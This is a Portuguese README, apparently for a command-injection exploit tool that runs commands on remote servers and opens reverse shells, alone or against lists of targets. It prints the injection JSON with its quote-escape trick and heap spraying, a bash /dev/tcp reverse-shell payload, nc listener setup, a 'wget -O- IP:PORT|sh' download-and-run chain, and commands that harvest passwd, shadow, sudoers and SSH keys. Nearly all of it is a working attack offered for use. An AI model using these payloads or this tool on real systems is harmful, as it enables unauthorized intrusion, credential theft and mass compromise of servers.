
Inclui detecção de comandos executáveis e getshell com um clique (requer implantação de serviço no servidor)
Inclui detecção de comandos executáveis e obtenção de shell com um clique (requer serviço no servidor)
pco.yaml pode ser usado com nuclei para detecção rápida
python go.py
Insira a URL alvo → selecione a função no menu.
# Detecção rápida (8 informações básicas)
python go.py -t https://IP:PORT --probe fast
# Detecção profunda (todos os comandos: 30+ itens)
python go.py -t https://IP:PORT --probe deep
# Detecção em lote
python go.py -f vulnerable_targets.txt --probe fast
python go.py -t https://IP:PORT -c "hostname"
python go.py -t https://IP:PORT -c "ls -la /root"
python go.py -t https://IP:PORT -c "cat /etc/passwd"
# Lote concorrente (20 threads)
python go.py -f targets.txt -c "hostname" --batch 20
Na máquina atacante, abra dois terminais:
# Terminal 1 - Serviço HTTP (fornece rev.sh)
echo 'bash -i >& /dev/tcp/YOUR_IP/8088 0>&1' > index.html
python3 -m http.server 8087
# Terminal 2 - Aguardar reversão
nc -lvnp 8088
Em seguida, envie o payload:
# Alvo único
python go.py -t https://IP:PORT -l YOUR_IP -p 8087 -n 8088
# Lote (serial, apenas um de cada vez)
python go.py -f targets.txt -l YOUR_IP -p 8087 -n 8088
O script imprimirá os passos de preparação antes de enviar.
| Categoria | Comando |
|---|---|
| Informações básicas | hostname, uname -a, kernel, OS release, uptime |
| Usuário | id, whoami, users/w/who |
| Rede | ifconfig, route, arp, listening ports, connections, iptables |
| Sistema | processes, cpuinfo, meminfo, disk, mount |
| Arquivos | ls / /root /tmp /home /etc |
| Configurações | crontab, passwd, shadow, sudoers, SSH keys |
| Extras | config search, scripts, docker, containers |
{"cmd":"getall","apiuser":"''''","apipass":"BBBBB",
"g0":"AAAAAAAAAAAAAAAA'; <comando> #", ...}
apiuser="''''" dispara a vulnerabilidade de escape_quotes() sem terminação nulag0~g60 heap spraying 61 vezes, aumentando a taxa de sucesso'; <comando> # fecha o contexto, # comenta o restanteSem echo tag, pode-se usar 34 caracteres:
wget -O- IP:PORT|sh (31 caracteres)
Cadeia de pipe: wget baixa → sh executa → bash reverte para a porta especificada.
| Parâmetro | Descrição |
|---|---|
-t, --target URL | Endereço alvo |
-f, --file FILE | Arquivo com lista de alvos |
-l, --lhost IP | IP da máquina atacante |
-p, --lport PORT | Porta do serviço HTTP (padrão 8087) |
-n, --ncport PORT | Porta de escuta nc (padrão 8088) |
-c, --cmd CMD | Comando a executar |
--probe fast/deep | Detecção rápida/profunda |
--batch N | Número de concorrência em lote (padrão serial) |